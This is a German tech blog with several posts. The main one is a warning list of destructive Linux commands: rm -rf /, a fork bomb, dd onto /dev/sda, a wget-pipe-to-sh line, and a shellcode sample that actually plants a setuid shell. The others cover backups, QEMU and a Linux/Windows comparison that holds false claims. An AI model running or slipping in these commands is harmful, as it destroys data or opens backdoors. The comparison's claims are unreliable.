WordPress umstellen auf https

Da die Daten¬≠schutz¬≠grund¬≠verord¬≠nung, DSGVO, einen ver¬≠ant¬≠wor¬≠tungsvollen Umgang mit Kun¬≠den¬≠dat¬≠en geset¬≠zlich vorschreibt, ist auch die Umstel¬≠lung auf ‚Äúhttps://‚ÄĚ mit einem SSL-Zer¬≠ti¬≠fikat zwin¬≠gend. Hier beschreibe ich f√ľr die Nachz√ľ¬≠gler der Umstel¬≠lung meine Meth¬≠ode der Umstel¬≠lung.

Inhaltsverzeichnis

Word­Press umstellen auf https weit­er­lesen

Gefährliche Befehle, Linux-Bom­ben


Inhaltsverzeichnis

Vor­wort
1. rm
2. rm -rf in hexa­dez­i­mal
3. Fork­bomb
4. Copy und Paste
5. Device Null
6. Oper­a­toren
7. WGET
8. dd
9. Weit­ere Befehle
Faz­it
Quellen


Vorwort

Vor­sicht, nur in virtuellen Maschi­nen testen! Als Test­sys­tem hat­te ich ein Ubun­tu 16.04 in eine virtuelle Mas­chine instal­liert und mehrfach kopiert.


1. rm

Die bekan¬≠nteste Lin¬≠ux-Bombe ist wohl ‚Äúrm‚ÄĚ, denn es wird oft vergessen den kom¬≠plet¬≠ten Pfad anzugeben, auch wenn man in einem Unter¬≠verze¬≠ich¬≠nis ist, denn dieser Befehl geht √ľber die Wurzel. Und es ist auch hoch bezahlten Admins schon passiert.

sudo rm -rf /

Dieser Befehl löscht ohne Nach­frage rekur­siv alles ab Wurzelverze­ich­nis. Alles heißt, alle einge­hängte Laufw­erke und auch alle Net­zlaufw­erke.
Funk­tion­iert tod­sich­er! Aber nicht unter dem Ubun­tu, dort wird eine War­nung aus­gegeben.
Gegen­maß­nahme
Ein Fall¬≠strick kann ‚Äúsafe-rm‚ÄĚ sein. Es soll vor unbe¬≠ab¬≠sichtigten l√∂schen helfen. Wer sich aber daran gew√∂h¬≠nt und auf einen anderen/neuen Rech¬≠n¬≠er kein ‚Äúsafe-rm‚ÄĚ instal¬≠liert hat, dann ist ‚Äúrm‚ÄĚ ist sein¬≠er Gewalt nicht zu brem¬≠sen.
Anson­sten hil­ft auch kein beten.
Quelle
Weit­eres in jedem Lin­ux-Hand­buch und jed­er Unix-Befehlsref­erenz.


2. rm -rf in hexadezimal

Ist genau­so schädlich:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

Unter Ubun¬≠tu m√ľssten dazu die Pakete release und bikeshed instal¬≠liert sein. Hat bei mir unter Ubun¬≠tu nicht funk¬≠tion¬≠iert.


3. Forkbomb

Rech­n­er aus­las­ten mit Hin­ter­grun­dak­tiv­ität und damit die CPU mal richtig heiß wird und sich selb­st aus­lötet.

:(){ :|:& };:

Funk¬≠tion die definiert wird, hier ‚Äú:()‚ÄĚ, ruft sich selb¬≠st als Hin¬≠ter¬≠grun¬≠dak¬≠tiv¬≠it√§t auf und √ľbergibt sich wieder neu und so weit¬≠er, also eine typ¬≠is¬≠che Fork¬≠bomb. Funk¬≠tion¬≠iert unter Ubun¬≠tu. B√∂sar¬≠tig, es wird am Anfang nicht gle¬≠ich wahrgenom¬≠men und Sys¬≠tem¬≠mon¬≠i¬≠tore, wie ‚ÄúConky‚ÄĚ, zeigen durch die 100% aus¬≠ge¬≠lastete CPU keine Ver√§n¬≠derun¬≠gen an.
Gegen­maß­nahme
Schutz gibt es, wenn die Datei ‚Äú/etc/security/limits.conf‚ÄĚ dem entsprechend edi¬≠tiert wird.


4. Copy und Paste

Das Inter¬≠net hil¬≠ft bei vie¬≠len Gele¬≠gen¬≠heit¬≠en, aber erset¬≠zt nicht das eigene Denken. Kopieren und Ein¬≠f√ľ¬≠gen kann gef√§hrlich sein. Hin¬≠ter ein¬≠er harm¬≠losen Eingabe wie

echo "Hallo Welt!"

kann man auch

rm -rf /

ver­steck­en.
Gegen­maß­nahme
Vor¬≠sicht¬≠shal¬≠ber in ein Edi¬≠tor ein¬≠f√ľ¬≠gen, hil¬≠ft aber auch nicht immer :-)


5. Device Null

Das Gerät Null ist tat­säch­lich ent­standen um Dat­en, die als unwichtig gel­ten, in das Nichts zu senden.
Doch fol­gende Befehlszeile löscht das gesamte /home-Verze­ich­nis des angemelde­tem Benutzers.

mv ~ /dev/null

In Ubun¬≠tu ist daf√ľr keine Berech¬≠ti¬≠gung vorhan¬≠den.
Gegen­maß­nahme
Nach­denken, was soll eine Tilde, also das /home-Verze­ich­nis, mit Null zu tun haben!


6. Operatoren

Gerne nutze ich das Kom¬≠man¬≠do ‚Äúls > Verzeichnis.txt‚ÄĚ um mir den Inhalt eines Verze¬≠ich¬≠nis als Text¬≠datei abzule¬≠gen. Und bei √Ąnderun¬≠gen lege ich mit dem dop¬≠pel¬≠ten Operan¬≠den ‚Äúls ¬Ľ Verzeichnis.txt‚ÄĚ in der sel¬≠ben Datei am Ende nach.

ls > /dev/sda

Wird aber dieser Befehl aus¬≠ge¬≠f√ľhrt √ľber¬≠schreibt er die genan¬≠nte Fest¬≠plat¬≠te mit sich selb¬≠st. Statt ‚Äúls‚ÄĚ k√∂n¬≠nte auch ein ander¬≠er Befehl genom¬≠men wer¬≠den, die Auswirkung ist gle¬≠ich, da hier der Operand den Fehler aus√ľbt. In Ubun¬≠tu ist daf√ľr keine Berech¬≠ti¬≠gung vorhan¬≠den.
Gegen­maß­nahme
Immer erst in ein¬≠er virtuellen Mas¬≠chine solche Kom¬≠man¬≠dos pr√ľfen.


7. WGET

Ist dieselbe Bequem¬≠lichkeit wie kopieren und ein¬≠f√ľ¬≠gen. Ein Script wird im Netz zur Ver¬≠f√ľ¬≠gung gestellt und nun kann man es ein¬≠fach durch die Shell aus¬≠f√ľhren, mit Ver¬≠hin¬≠derung von wichti¬≠gen Infor¬≠ma¬≠tio¬≠nen.

wget http://webseite.com -q | sh

Nur, ob die Beschrei¬≠bung des Skriptes mit dem tat¬≠s√§ch¬≠lichem Inhalt √ľbere¬≠in¬≠stimmt, ist hier nicht plau¬≠si¬≠bel erwiesen.
Hat in mein­er Ubun­tu-Instal­la­tion nicht funk­tion­iert.
Gegen­maß­nahme
Durch ‚Äúqui¬≠et‚ÄĚ ist es noch nicht mal m√∂glich die Gefahr zu ban¬≠nen, zum Beispiel mit ‚ÄúStrg+c‚ÄĚ.


8. dd

Dieses Kom¬≠man¬≠do ist zum Kopieren gedacht. Hier ist Miss¬≠brauch m√∂glich, um Daten¬≠tr√§ger zu √ľber¬≠schreiben.

dd if=/dev/urandom of=/dev/sda

An diesem Beispiel wer­den Zufall­szahlen auf die gesamte Fest­plat­te geschrieben und somit der vorhan­dene Inhalt gelöscht.
Gegen­maß­nahme
Da hab ich es mit Nel¬≠son -> ‚ÄúHaha‚ÄĚ.


9. Weitere Befehle die vorsichtig angewendet werden sollten.

Die nach­fol­gen­den Kom­man­dos habe ich nicht getestet, erscheinen aber logisch.

sudo chmod 000 -R /

Rechte wer¬≠den rekur¬≠siv ent¬≠zo¬≠gen oder keine erteilt wie man¬īs sieht. Dat¬≠en bleiben aber erhal¬≠ten.
Mit umask wären sicher­lich auch solche Spielchen möglich.

touch root
sudo chattr +i root

Datei mit +i unverän­der­lich set­zen

sudo chattr -i root

Attrib­ut wieder ent­fer­nen


10. Fazit

Das sind wohl einige der bekan¬≠ntesten Fall¬≠gruben. Trotz¬≠dem sollte bei ange¬≠boten¬≠er Hil¬≠fe das eigene Denken die erste H√ľrde sein und ein gesun¬≠des Ma√ü an Mis¬≠strauen, ob andere nicht auch Fl√ľchtigkeits¬≠fehler machen, w√§re ange¬≠bracht.


Quellen

Lin­ux-Hand­buch von Kofler, Gallileo-Ver­lag
Unix-Befehlsref­eren­zen im Netz
http://www.junauza.com/2008/11/7-deadly-linux-commands.html
https://ppfeufer.de/lokale-linuxssicherheit-oder-wie-entschaerf-ich-die-bombe.html/
https://www.schnatterente.net/software/versteckter-schadcode-gefaehrliche-linux-howtos/2
https://www.heise.de/security/dienste/Copy-Paste-Tricks-1842691.html
https://de.wikipedia.org/wiki//dev/null
https://de.godaddy.com/blog/die-5-gefaehrlichsten-kommandos-in-der-linux-konsole/
https://wiki.ubuntuusers.de/wget/
http://www.linux-community.de/Internal/Nachrichten/Die-7-toedlichsten-Linux-Kommandos

Ransom und Backup


Inhaltsverzeichnis

Auf die erpresserische Forderung einge­hen
K√∂n¬≠nen ver¬≠schl√ľs¬≠selte Dat¬≠en wieder entschl√ľs¬≠selt wer¬≠den
Schutz­maß­nah­men
Kein Back­up? Kein Mitleid!
Der wirk­liche Grund, weshalb das Back­up ver­nach­läs­sigt wird
Gibt es eine ein­fache und schnelle und bil­lige Back­up-Lösung
Wo entste­hen die Kosten
Faz­it


Aus mein¬≠er Sicht gibt es mehrere Schutz¬≠ma√ü¬≠nah¬≠men gegen√ľber Ver¬≠schl√ľs¬≠selungssoft¬≠ware von Erpressern. Doch nur in ihrer Summe sind diese Ma√ü¬≠nah¬≠men erfol¬≠gre¬≠ich.


Auf die erpresserische Forderung eingehen

macht keinen Sinn. Warum sollen die Erpress¬≠er das Risiko einge¬≠hen, bei welch auch immer geart¬≠eten √úber¬≠gabe des Schl√ľs¬≠sels, ent¬≠tarnt zu wer¬≠den? Au√üer¬≠dem wollen diese ja nur Geld und keine weit¬≠ere Arbeit, denn irgendwelche Ref¬≠eren¬≠zen k√∂n¬≠nen zu den Erpressern nicht abge¬≠fragt wer¬≠den, Stich¬≠wort Ent¬≠tar¬≠nung.


K√∂nnen verschl√ľsselte Daten wieder entschl√ľsselt werden

Ja. Doch die wenig­sten Men­schen, Fir­men und Insti­tu­tio­nen haben soviel Zeit, soviel Geld und soviel Rechenka­paz­ität um das ern­sthaft zu erwä­gen.


Schutzmaßnahmen

In der Pri­or­ität aufge­lis­tet sind das
1. ein intel­li­gentes Betrieb­ssys­tem
2. ein Bewusst¬≠sein f√ľr die Sicher¬≠heit der eige¬≠nen Dat¬≠en
3. freie quellof­fene Soft­ware
4. ständi­ge Aktu­al­isierung des Betrieb­ssys­tems und jeglich­er Soft­ware
5. Back­up
Nur zusam¬≠men ergeben diese Ma√ü¬≠nah¬≠men ein Abwehrpaket gegen√ľber den Erpressern. √úber die ersten vier Punk¬≠te habe ich schon des √∂fteren Beitr√§ge geschrieben und auch √ľber das Back¬≠up.
Entschei¬≠dung¬≠shil¬≠fe beim ersten Punkt, alle intel¬≠li¬≠gen¬≠ten Betrieb¬≠ssys¬≠teme haben einen Frontslash oder auch For¬≠ward Slash ‚Äú/‚ÄĚ zum tren¬≠nen von Verze¬≠ich¬≠nis¬≠sen.


Kein Backup? Kein Mitleid!

Die meis¬≠ten haben die Ein¬≠sicht das Back¬≠up wichtig ist, doch nur ein Bruchteil besitzt ein Back¬≠up das j√ľnger ist als 2 Wochen.
Back­up ist zu aller erst sehr unbe­quem
‚ÄĒ wie erstelle ich ein richtiges Back¬≠up
‚ÄĒ welche Dat¬≠en m√ľssen gesichert wer¬≠den und welche nicht
‚ÄĒ welche Soft¬≠ware ist die richtige
‚ÄĒ wie lange dauert so ein Back¬≠up
‚ÄĒ wie oft soll ein Back¬≠up erstellt wer¬≠den
‚ÄĒ wohin wird ein Back¬≠up erstellt
‚ÄĒ wie funk¬≠tion¬≠iert ein Restore des Back¬≠up
‚ÄĒ m√ľssen noch andere Sachen beachtet wer¬≠den
‚ÄĒ wie wer¬≠den Fehler beim Back¬≠up ver¬≠mieden
‚ÄĒ geht das auch automa¬≠tisch mit dem Back¬≠up
‚ÄĒ welche Schnittstellen f√ľr Hard- und Soft¬≠ware sind zug√§nglich
‚ÄĒ und weit¬≠ere Fra¬≠gen sind zu beant¬≠worten

Gut alle diese Fra­gen kön­nen nur mit einem geschriebe­nen Buch beant­wortet wer­den.

Bei Ver­ant­wor­tung außer­halb der eige­nen Per­son gibt es noch zwei weit­ere Unbe­quem­lichkeit­en, echte Kosten, auch wenn die Soft­ware kosten­los ist, und Zeit­man­gel.


Der wirkliche Grund, weshalb das Backup vernachlässigt wird

Weshalb sollte man 19.999 Mal Dat­en sich­ern wenn diese nur in jedem 20.000 Fall benötigt wer­den?
Als pri¬≠vater Men¬≠sch trauert man Bilder, Videos und Musik hin¬≠ter¬≠her. Doch bei Ver¬≠ant¬≠wor¬≠tung au√üer¬≠halb der eige¬≠nen Per¬≠son geht es ans Eingemachte. Fol¬≠gende Fra¬≠gen bleiben unbeant¬≠wortet ‚ÄěWelche Liefer¬≠ung wurde durchge¬≠f√ľhrt?‚Äú, ‚ÄěWelche Rech¬≠nung ist offen?‚Äú und zudem ist viel Kor¬≠re¬≠spon¬≠denz ver¬≠loren.


Gibt es eine einfache und schnelle und billige Backup-Lösung

Nein, defin­i­tiv!


Wo entstehen die Kosten

Es gibt zwei Kosten­fak­toren
a) die benötigte Hard­ware
b) die pro­fes­sionelle und indi­vidu­elle Kon­fig­u­ra­tion

Zu a)
Egal welche Hard­ware genutzt wird, dazu zählt auch die Cloud, es kostet Geld.
Jet¬≠zt kom¬≠men die Ober¬≠schlauen und meinen ihre Cloud w√§re kosten¬≠los und h√§tte genug Spe¬≠icher¬≠platz. Aber ich habe keine Lust solch einen Irrtum aufzuk¬≠l√§ren, da hier schon ele¬≠men¬≠tar die Sicher¬≠heit der eigen Dat¬≠en als v√∂l¬≠lig unwichtig gese¬≠hen wird, trotz eigen¬≠er Ver¬≠schl√ľs¬≠selung. Nur soviel, die IP-Adressen die dieses Back¬≠up besuchen muss, und dort dupliziert wer¬≠den kann, um endlich in ‚Äěihrer‚Äú Cloud zu lan¬≠den, f√ľllen m√∂glicher¬≠weise eine Din A4-Seite.

Zu b)
Wer noch nie viel Zeit hat­te, sich mit Sicher­heit und Back­up von Dat­en auseinan­der zuset­zen, wird die richtige und schnelle Back­up-Lösung trotz pro­fes­sioneller Soft­ware nicht find­en. Erst die indi­vidu­elle Lösung, ist auch das schnell­ste Back­up und spart sehr viel Zeit und möglicher­weise Hard­ware.


Fazit

Der wichtig¬≠ste Fak¬≠tor bei Ver¬≠schl√ľs¬≠selung und Back¬≠up ist die Zeit und nicht das Geld, aber ste¬≠ht kein Geld zur Ver¬≠f√ľ¬≠gung nutzt auch viel Zeit nichts.

Qemu

Aus Sicher¬≠heits¬≠gr√ľn¬≠den und um einen Kom¬≠fort zu geniessen, besitze ich mehrere vir¬≠tu¬≠al¬≠isierte Betrieb¬≠ssys¬≠teme. Fr√ľher nahm ich dazu die ‚ÄúVir¬≠tu¬≠al¬≠Box‚ÄĚ von ‚ÄúOra¬≠cel‚ÄĚ. Doch da die Fir¬≠men¬≠poli¬≠tik von ‚ÄúOra¬≠cel‚ÄĚ mir nicht gef√§llt, habe ich mich seit l√§n¬≠gerem ‚Äúqemu‚ÄĚ zu gewandt. Hier nun einige Erken¬≠nt¬≠nis¬≠sen von mir.


Inhaltsverzeichnis

Grund­sät­zlich­es
Tas­tenkom­bi­na­tio­nen
qemu-mon­i­tor
Starten √ľber Icon
Links
Bilder


Grundsätzliches

  • qemu-Vir¬≠tu¬≠al¬≠isierun¬≠gen laufen, wie auch die Betrieb¬≠ssys¬≠teme von ‚ÄúVir¬≠tu¬≠al¬≠Box‚ÄĚ, in einem eigen¬≠em Fen¬≠ster.
  • √úber den qemu-Mon¬≠i¬≠tor, ein¬≠er Spezialkon¬≠sole, sind zus√§t¬≠zliche Steuerun¬≠gen w√§hrend des laufend¬≠en Betriebes m√∂glich.
  • Instal¬≠la¬≠tio¬≠nen und Laufw¬≠erke k√∂n¬≠nen ohne grafis¬≠che Ober¬≠fl√§che erstellt wer¬≠den.
  • Die Laufw¬≠erke k√∂n¬≠nen direkt mit einem Link, oder ‚ÄúStarter‚ÄĚ, gebootet wer¬≠den.
  • Es ste¬≠hen aber auch einige GUIs zur Ver¬≠f√ľ¬≠gung. Ich empfehle den ‚Äúvirt-man¬≠ag¬≠er‚ÄĚ.
  • Tas¬≠tenkom¬≠bi¬≠na¬≠tion lassen schnelles Arbeit¬≠en zu.

Tastenkombinationen

Vir­tu­al­isierungs­fen­ster
Strg + Alt + f Umschal­ten zwis­chen Fen­ster- auf Voll­bild­modus
Strg + Alt + u Fen­ster nach Größenän­derung wieder­her­stellen
Strg + Alt Maus aus dem Vir­tu­al­isierungs­fen­ster holen
qemu-mon­i­tor
Strg + Alt + 2 Wech­sel vom Vir­tu­al­isierungs­fen­ster in den qemu-mon­i­tor
Strg + Alt + 1 Wech­sel vom qemu-mon­i­tor in das Vir­tu­al­isierungs­fen­ster

qemu-monitor

Beispiele von Eingaben

sendkey ctrl-alt-f1 auf die erste Kon­sole im Vir­tu­al­isierungs­fen­ster schal­ten
sendkey ctrl-alt-f2 auf die zweite Kon­sole im Vir­tu­al­isierungs­fen­ster schal­ten
sendkey ctrl-alt-f7 zur√ľck auf die GUI im Vir¬≠tu¬≠al¬≠isierungs¬≠fen¬≠ster schal¬≠ten
screendump bild.ppm Erstellt ein Bild­schirm­fo­to vom Vir­tu­al­isierungs­fen­ster im Verze­ich­nis wo das virtuelle Laufw­erk liegt.
system_reset Erste Hil­fe, wenn ein Sys­tem hängt.
system_powerdown Ern­ste Hil­fe, wenn ein Sys­tem hängt.
q Let­zte Hil­fe, wenn ein Sys­tem hängt. Auch quit.

Starten √ľber Icon

Ein¬≠fach ein Laufw¬≠erk, zum Beispiel auf den Schreibtisch, mit ein¬≠er Verkn√ľp¬≠fung, bei Ubun¬≠tu hei√üt das ‚ÄúStarter‚ÄĚ, booten.


Den Starter kön­nte man so ein­richt­en:
Beschrei­bung: Win­dows 10 starten
Befehl: qemu-sys­tem-x86_64 -enable-kvm -M q35 /home/mein-name/virtuelle-laufwerke/Windows10-64bit.vdi -cpu Opteron_G5 -smp 2 -m 2G -k de -vga qxl -dis­play sdl,window_close=off
Arbeitsverze­ich­nis:/home­/mein-name/virtuelle-laufw­erke


Der Befehl im Einzelnem

qemu-system-x86_64

das Grundsys­tem der Vir­tu­al­isierung, der Emu­la­tor

-enable-kvm

diese Option verbindet den Emu­la­tor mit dem Wirtssys­tem

-M q35

diese Option holt den mod¬≠er¬≠nen virtuellen Chip¬≠satz ‚ÄúQ35‚ÄĚ

/home/mein-name/virtuelle-laufwerke/Windows10-64bit.vdi

dieser Pfad holt beispiel­sweise ein von der Vir­tu­al­Box geschaf­fenes Laufw­erk in qemu

-cpu Opteron_G5

dies Option bes¬≠timmt die gew√ľn¬≠schte CPU

-smp 2

Anzahl der CPU-Kerne, beachte das Wirtssys­tem

-m 2G

diese Option bes¬≠timmt 2 GB RAM f√ľr die Vir¬≠tu¬≠al¬≠isierung, beachte das Wirtssys¬≠tem

-k de

hier­mit wird die deutsche Tas­tatur geladen

-vga qxl

QXL ist der Grafik­treiber

-display sdl,window_close=off
display sdl 

ste¬≠ht f√ľr seper¬≠ates grafis¬≠ches Fen¬≠ster und

,window_close=off

bedeutet, das Fen­ster kann nicht geschlossen wer­den, also gegen unbe­ab­sichtigtes abschießen der Vir­tu­al­isierung

Links

Hier sind weit¬≠er¬≠f√ľhrende Links zum The¬≠ma. Aber Vor¬≠sicht, manche Ein¬≠stel¬≠lun¬≠gen sind nicht f√ľr x86 oder x64 CPUs und im g√ľn¬≠stig¬≠stem Falle ein¬≠fach nur wirkungs¬≠los.
https://wiki.ubuntuusers.de/QEMU/
https://wiki.ubuntuusers.de/KVM/
https://wiki.archlinux.org/index.php/QEMU
https://wiki.archlinux.de/title/QEMU#QEMU-Monitor
https://en.wikibooks.org/wiki/QEMU/Monitor
http://download.qemu-project.org/qemu-doc.html


Bilder

‚ÄúGrsync‚ÄĚ inkrementelles Backup mit Ausschluss von Verzeichnissen

Der Sinn von Back­ups ist in diesem Beitrag nicht Gegen­stand.

Inhaltsverze­ich­nis

  1. Inkre­mentelles Back­up
  2. Vor­bere­itun­gen
  3. Der Befehle rsync mit der grafis¬≠chen Auf¬≠satz ‚ÄúGrsync‚ÄĚ.
  4. Auss­chluss von Dateien und Verze­ich­nis­sen
  5. Ver­weise

Inkre­mentelles Back­up
In dieser Art wer­den nur geän­derte Dateien und Verze­ich­nisse mit einem schon vorhan­den­em Back­up syn­chro­nisiert. Nur beim erst­ma­li­gen Benutzung der inkre­mentellen Syn­chro­ni­sa­tion, wird ein kom­plettes Back­up erstellt.
Die Vorteile dieser Art von Back­up liegt darin:

  • es dauert nur wenige Sekun¬≠den auf SSD-Fest¬≠plat¬≠ten
  • es dauert nur wenige Minuten auf HDD-Fest¬≠plat¬≠ten
  • es kann t√§glich ohne Mehraufwand durchge¬≠f√ľhrt wer¬≠den, auf dem 1. Back¬≠up-Medi¬≠um
  • es kann w√∂chentlich ohne Mehraufwand durchge¬≠f√ľhrt wer¬≠den, auf dem 2. Back¬≠up-Medi¬≠um

Vor­bere­itun­gen
Damit nur rel¬≠e¬≠vante Dat¬≠en gesichert wer¬≠den sind muss eine Bere¬≠ini¬≠gung von unn√∂ti¬≠gen Dat¬≠en durchge¬≠f√ľhrt wer¬≠den. Wenn Sie es nicht wis¬≠sen wie, nehmen Sie bleachbit zu Hil¬≠fe. Nur wenn Sie wirk¬≠lich wis¬≠sen was Sie tun, soll¬≠ten ein¬≠mal im Monat die ver¬≠wais¬≠ten Pakete und dop¬≠pelte Dateien ent¬≠fer¬≠nt wer¬≠den.


Der Befehle rsync mit der grafis¬≠chen Auf¬≠satz ‚ÄúGrsync‚ÄĚ.
Grsync-01


Auss­chluss von Dateien und Verze­ich­nis­sen
Der Auss­chluss erfol­gt so, das der Pfad im jew­eili­gen Verze­ich­nis begin­nt.

Beispiel mit Grsync unter ‚ÄúErweit¬≠erte Optio¬≠nen‚ÄĚ

--exclude=/.config/geheimes-verzeichnis

Beispiel mit rsync im Ter­mi­nal

rsync -r -t -v --progress --delete --size-only -s --exclude=/.config/geheimes-verzeichnis //home/ /media/home/

Vor­sicht, oft wird der gesamte Pfad einge­tra­gen, das ist dann Wirkungs­los.
Falsches Beispiel

--exclude=/home/user/.config/geheimes-verzeichnis

Ver­weise
Daten¬≠sicherung ‚Äď Back¬≠up
Super¬≠schnell ISO-Datei erstellen von CD oder DVD mit Befehl ‚Äědd‚Äú
Win­dows-Umzug von HDD auf SSD
Win¬≠dows zu Lin¬≠ux ‚Äď der Umstieg

Unterschiede zwischen Linux und Windows

Das ist ein Ver­such bei­de Betrieb­ssys­teme zu ver­gle­ichen.

Inhaltsverze­ich­nis

  1. Soft­ware
  2. Hard­ware
  3. Viren
  4. Sicher­heit
  5. Updates und Aktu­al­isierun­gen
  6. Ver­bre­itung und Kom­pat­i­bil­ität
  7. Benutzer­fre­undlichkeit
  8. Ver­weise

Lin­ux Win­dows
Soft­ware
Soft¬≠ware wird auss¬≠chlie√ülich √ľber ein Por¬≠tal der Dis¬≠tri¬≠b¬≠u¬≠tion instal¬≠liert, das gew√§hrleis¬≠tet die Echtheit und die Sicher¬≠heit des jew¬≠eili¬≠gen Pro¬≠gramms.
Zugang zu diesem Por¬≠tal beste¬≠ht √ľber
  • Soft¬≠ware-Cen¬≠ter oder
  • Synap¬≠tic oder
  • Ter¬≠mi¬≠nal instal¬≠liert.

Falls Soft­ware aus dem Inter­net­brows­er instal­liert wird, ist das Sys­tem kom­prim­iert, also unsich­er und die Sta­bil­ität ist aufge­hoben.

Soft­ware wird aus
  • ver¬≠schiede¬≠nen Quellen und
  • nicht gepr√ľft Quellen instal¬≠liert.

Außer­dem wer­den

  •  unge¬≠fragt Zusatz-Soft¬≠ware instal¬≠liert,
  • Brows¬≠er-Fen¬≠ster mit Wer¬≠bung ge√∂ffnet,
  • die Kon¬≠trolle durch ‚ÄěEin¬≠fache Instal¬≠la¬≠tion‚Äú ent¬≠zo¬≠gen und
  • meist die Pro¬≠gramme unge¬≠fragt in den Autostart ver¬≠linkt, wom¬≠it der PC sofort langsamer wird f√ľr die gesamte Leben¬≠szeit.
Die Stan­dart­soft­ware der Dis­tri­b­u­tion ist kosten­los und zwis­chen allen meist genutzten Betrieb­ssys­te­men les­bar. Win­dows ist kostenpflichtig, außer das abge­laufene Ange­bot des Update von Win­dows 7 bis Win­dows 8.1 auf Win­dows 10. Viele ange­bote­nen Pro­gramme sind kostenpflichtig und damit nicht inter­op­er­abel.
F√ľr jede Soft¬≠ware ist Voraus¬≠set¬≠zung eine aus¬≠f√ľhrlich¬≠er Hil¬≠fe¬≠text. Meist ist auch ein Hand¬≠buch dabei. Soft¬≠ware¬≠hil¬≠fe ist keine Voraus¬≠set¬≠zung f√ľr Win¬≠dows-Soft¬≠ware.
Hard­ware
Geräte wer­den meist von Lin­ux sofort erkan­nt und instal­liert. Geräte wer­den zum Teil erkan­nt. Manch­mal wer­den bei älteren Geräten Stan­dart­treiber instal­liert.
Aus¬≠nah¬≠men sind bil¬≠lig hergestellte Mehrfunk¬≠tion¬≠s¬≠ger√§te und manch¬≠mal WLAN-Ger√§te, da diese dem Sicher¬≠heit¬≠skonzept von Lin¬≠ux zu wider laufen. Oft m√ľssen Treiber-CD-ROMS ein¬≠gelegt wer¬≠den, die unge¬≠fragt andere Soft¬≠ware zu den Treibern mit instal¬≠liert. Zudem ist die zus√§t¬≠zliche Soft¬≠ware redun¬≠dant, da meist schon funk¬≠tionell diesel¬≠ben Pro¬≠gramme vorhan¬≠den sind und genutzt wird.
Eine Fest­plat­te mit Lin­ux läuft sofort auf einen anderen Rech­n­er ohne Neuin­stal­la­tion. Eine Fest­plat­te mit Win­dows läuft nur inner­halb eines und des­sel­ben Com­put­ers.
Viren
Viren f√ľr Lin¬≠ux in freier Wild¬≠bahn existieren nicht.
Trotz¬≠dem kann ein Antiviren-Pro¬≠gramm, wie ‚ÄěClam-TK‚Äú instal¬≠liert wer¬≠den, um beispiel¬≠sweise Soft¬≠ware und E-Mails von Win¬≠dows-Rech¬≠n¬≠ern zu pr√ľfen, damit diese auf anderen Win¬≠dows-Rech¬≠n¬≠ern keinen Schaden mehr anricht¬≠en k√∂n¬≠nen.
Anti-Viren-Soft­ware ist zwin­gend notwendig.
Die Neben¬≠wirkung ist, das die Sys¬≠tem¬≠res¬≠sourcen zur H√§lfte schon aus¬≠genutzt sind und dem t√§glichen Arbeit¬≠en nicht mehr zur Ver¬≠f√ľ¬≠gung ste¬≠ht.
Sicher­heit
Offene Pro¬≠gram¬≠mquellen, mit der M√∂glichkeit der √úber¬≠pr√ľ¬≠fung. Geschlossen¬≠er, unbekan¬≠nter und mit vie¬≠len nicht gepatcht¬≠en Sicher¬≠heitsl√ľcken behafteter Pro¬≠gramm¬≠code.
Admin¬≠is¬≠tra¬≠tor-Rechte, unter Lin¬≠ux root-Rechte, nur begren¬≠zt auf Zeit und meist nur f√ľr eine Funk¬≠tion. Zum kom¬≠fort¬≠ablen Arbeit¬≠en ist meist der Benutzer immer mit Admin¬≠is¬≠tra¬≠tor-Recht¬≠en aus¬≠ges¬≠tat¬≠tet, was Viren und ander¬≠er Schad¬≠soft¬≠ware alle T√ľren √∂ffnet.
Soft¬≠ware aus ein¬≠er sicheren und gepr√ľften Quellen der eige¬≠nen Dis¬≠tri¬≠b¬≠u¬≠tion. Soft¬≠ware wird aus ver¬≠schiede¬≠nen Quellen und nicht gepr√ľft Quellen instal¬≠liert, da unter Win¬≠dows 10 der ‚ÄúWin¬≠dows Store‚ÄĚ sehr sehr mager ist.
Kein Antiviren­pro­gramm zwin­gend notwendig. Anti-Viren-Soft­ware ist zwin­gend notwendig.
Updates und Aktu­al­isierun­gen
Es existiert ein Update-Ser¬≠vice f√ľr die gesamte instal¬≠lierte Soft¬≠ware. Es sind ver¬≠schiedene Updater instal¬≠liert.
  • Win¬≠dows-Updater
  • Microsoft-Updater
  • Updater f√ľr Adobe-Pro¬≠duk¬≠te,
  • Updater f√ľr die Java-Umge¬≠bung
  • und viele weit¬≠ere.

Diese Updater sind entwed­er omnipresent im Autostart oder als Dienst.

Sicher¬≠heit¬≠sup¬≠dates kom¬≠men sofort nach¬≠dem diese erstellt sind. Also wenn notwendig mehrmals t√§glich. Sicher¬≠heit¬≠sup¬≠dates kom¬≠men erst nach vorgegebe¬≠nen Zeit¬≠en im Monat oder im Jahr, solange bleiben die Sicher¬≠heit¬≠sl√ľck¬≠en bekan¬≠nt und offen f√ľr Angriffe.
Ein Neustart ist bei 99,99% nicht notwendig, also extrem sel­ten. Nach mein­er Erfahrung etwa 3x im Jahr.
Der Neustart ist nur um wenige Sekun­den verzögert.
Ein Neustart ist immer notwendig.
Ein Neustart kann bis Stun­den dauern.
Soft­ware-Updates wer­den bei den meis­ten Dis­tri­b­u­tio­nen sofort ange­boten, sofort nutzbar und ein Neustart ist nicht notwendig. Ob neue Ver­sio­nen vorhan­den sind, muss sel­ber vom Benutzer erkun­det wer­den, außer bei den jew­eili­gen Updatern von ver­schieden Pro­gram­men.
Ein Neustart ist meist notwendig.
Ver­bre­itung und Kom­pat­i­bil­ität
Lin­ux, Unix, BSD, alle Apple-Betrieb­ssys­teme, Android und die meis­ten anderen Betrieb­ssys­teme sind vom Betrieb­skern aus ein­er Quelle ent­standen.
Erkennbar ist das f√ľr jeden, durch den Frontslash bei Pfadangaben.
Win­dows ist ein Betrieb­ssys­tem, das selb­st inner­halb sein­er eigene Ver­sio­nen nicht kom­pat­i­bel ist.
